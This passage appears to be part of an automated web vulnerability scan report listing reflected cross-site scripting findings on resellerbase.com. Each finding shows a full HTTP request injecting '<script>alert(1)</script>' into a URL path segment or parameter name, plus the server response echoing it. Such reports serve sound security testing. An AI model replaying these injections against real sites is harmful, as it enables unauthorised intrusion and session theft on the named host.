Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail881be<script>alert(1)</script>26cc27c95c1/16/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1316. http://www.resellerbase.com/detail/16/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b33b0<script>alert(1)</script>57f927d02c1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16b33b0<script>alert(1)</script>57f927d02c1/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16b33b0<script>alert(1)</script>57f927d02c1/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1317. http://www.resellerbase.com/detail/16/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 14123<script>alert(1)</script>b51a5de0a70 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes14123<script>alert(1)</script>b51a5de0a70/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes14123<script>alert(1)</script>b51a5de0a70/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1318. http://www.resellerbase.com/detail/16/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8b336<script>alert(1)</script>cd6f1190caa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos8b336<script>alert(1)</script>cd6f1190caa/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos8b336<script>alert(1)</script>cd6f1190caa/ was not found on this server.</p>
...[SNIP]...

2.1319. http://www.resellerbase.com/detail/16/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e522c<script>alert(1)</script>bdae7d5156b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/?e522c<script>alert(1)</script>bdae7d5156b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/?e522c<script>alert(1)</script>bdae7d5156b=1 was not found on this server.</p>
...[SNIP]...

2.1320. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 51950<script>alert(1)</script>90066cd51c0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail51950<script>alert(1)</script>90066cd51c0/16/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail51950<script>alert(1)</script>90066cd51c0/16/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1321. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40cc7<script>alert(1)</script>66862264298 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1640cc7<script>alert(1)</script>66862264298/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1640cc7<script>alert(1)</script>66862264298/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1322. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c0e4e<script>alert(1)</script>934b34ba44e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themesc0e4e<script>alert(1)</script>934b34ba44e/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themesc0e4e<script>alert(1)</script>934b34ba44e/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1323. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ef44<script>alert(1)</script>92de2721c98 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos3ef44<script>alert(1)</script>92de2721c98/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos3ef44<script>alert(1)</script>92de2721c98/images/ was not found on this server.</p>
...[SNIP]...

2.1324. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ffd38<script>alert(1)</script>7f81ba0d753 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/imagesffd38<script>alert(1)</script>7f81ba0d753/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1325. http://www.resellerbase.com/detail/16/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 99284<script>alert(1)</script>8ad597ac3a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/?99284<script>alert(1)</script>8ad597ac3a0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/?99284<script>alert(1)</script>8ad597ac3a0=1 was not found on this server.</p>
...[SNIP]...

2.1326. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 306d5<script>alert(1)</script>f6a957e88d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail306d5<script>alert(1)</script>f6a957e88d6/16/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail306d5<script>alert(1)</script>f6a957e88d6/16/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1327. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92c2b<script>alert(1)</script>3871f34179a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1692c2b<script>alert(1)</script>3871f34179a/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1692c2b<script>alert(1)</script>3871f34179a/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1328. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3b4f2<script>alert(1)</script>2e2482eca5e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes3b4f2<script>alert(1)</script>2e2482eca5e/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes3b4f2<script>alert(1)</script>2e2482eca5e/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1329. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9dc24<script>alert(1)</script>116e9cbcfef was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos9dc24<script>alert(1)</script>116e9cbcfef/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos9dc24<script>alert(1)</script>116e9cbcfef/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1330. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b5056<script>alert(1)</script>0c7a695303d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/imagesb5056<script>alert(1)</script>0c7a695303d/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/imagesb5056<script>alert(1)</script>0c7a695303d/rating/ was not found on this server.</p>
...[SNIP]...

2.1331. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b89bc<script>alert(1)</script>20e72ba475c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/ratingb89bc<script>alert(1)</script>20e72ba475c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/ratingb89bc<script>alert(1)</script>20e72ba475c/ was not found on this server.</p>
...[SNIP]...

2.1332. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e0a36<script>alert(1)</script>19a96630b56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themes/kosmos/images/rating/?e0a36<script>alert(1)</script>19a96630b56=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16/themes/kosmos/images/rating/?e0a36<script>alert(1)</script>19a96630b56=1 was not found on this server.</p>
...[SNIP]...

2.1333. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a0a60<script>alert(1)</script>be15ccf100c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila0a60<script>alert(1)</script>be15ccf100c/16/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila0a60<script>alert(1)</script>be15ccf100c/16/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1334. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd0cd<script>alert(1)</script>48c0dc70cac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16fd0cd<script>alert(1)</script>48c0dc70cac/themes/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/16fd0cd<script>alert(1)</script>48c0dc70cac/themes/kosmos/images/rating/5.gif was not found on this server.</p>
...[SNIP]...

2.1335. http://www.resellerbase.com/detail/16/themes/kosmos/images/rating/5.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/16/themes/kosmos/images/rating/5.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b3892<script>alert(1)</script>c80695c1187 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/16/themesb3892<script>alert(1)</script>c80695c1187/kosmos/images/rating/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:08 GMT
Server: Apache/2
